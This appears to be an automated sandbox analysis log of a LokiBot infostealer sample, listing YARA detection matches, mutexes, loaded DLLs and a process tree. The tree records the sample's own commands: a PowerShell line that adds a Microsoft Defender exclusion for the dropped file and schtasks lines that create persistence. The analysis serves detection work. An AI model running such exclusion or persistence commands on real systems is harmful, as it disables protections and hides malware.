                Source: gunzipped.exe, 00000000.00000002.1992453854.000000000098E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs gunzipped.exe
                Source: gunzipped.exeBinary or memory string: OriginalFilenameEnYo.exeX vs gunzipped.exe
                Source: gunzipped.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: gunzipped.exe PID: 6400, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: WiHDtnb.exe PID: 3220, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: WiHDtnb.exe PID: 6148, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: gunzipped.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: WiHDtnb.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, h17c3NXtdNiUK364F8.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, h17c3NXtdNiUK364F8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/13@0/1
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 12_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,12_2_0040434D
                Source: C:\Users\user\Desktop\gunzipped.exeFile created: C:\Users\user\AppData\Roaming\WiHDtnb.exeJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeMutant created: \Sessions\1\BaseNamedObjects\BWsWvjKaS
                Source: C:\Users\user\Desktop\gunzipped.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC9C3.tmpJump to behavior
                Source: gunzipped.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: gunzipped.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\gunzipped.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: gunzipped.exeReversingLabs: Detection: 18%
                Source: C:\Users\user\Desktop\gunzipped.exeFile read: C:\Users\user\Desktop\gunzipped.exe:Zone.IdentifierJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\WiHDtnb.exe C:\Users\user\AppData\Roaming\WiHDtnb.exe
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess created: C:\Users\user\AppData\Roaming\WiHDtnb.exe "C:\Users\user\AppData\Roaming\WiHDtnb.exe"
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"Jump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"Jump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess created: C:\Users\user\AppData\Roaming\WiHDtnb.exe "C:\Users\user\AppData\Roaming\WiHDtnb.exe"Jump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: urlmon.dllJump to behavior
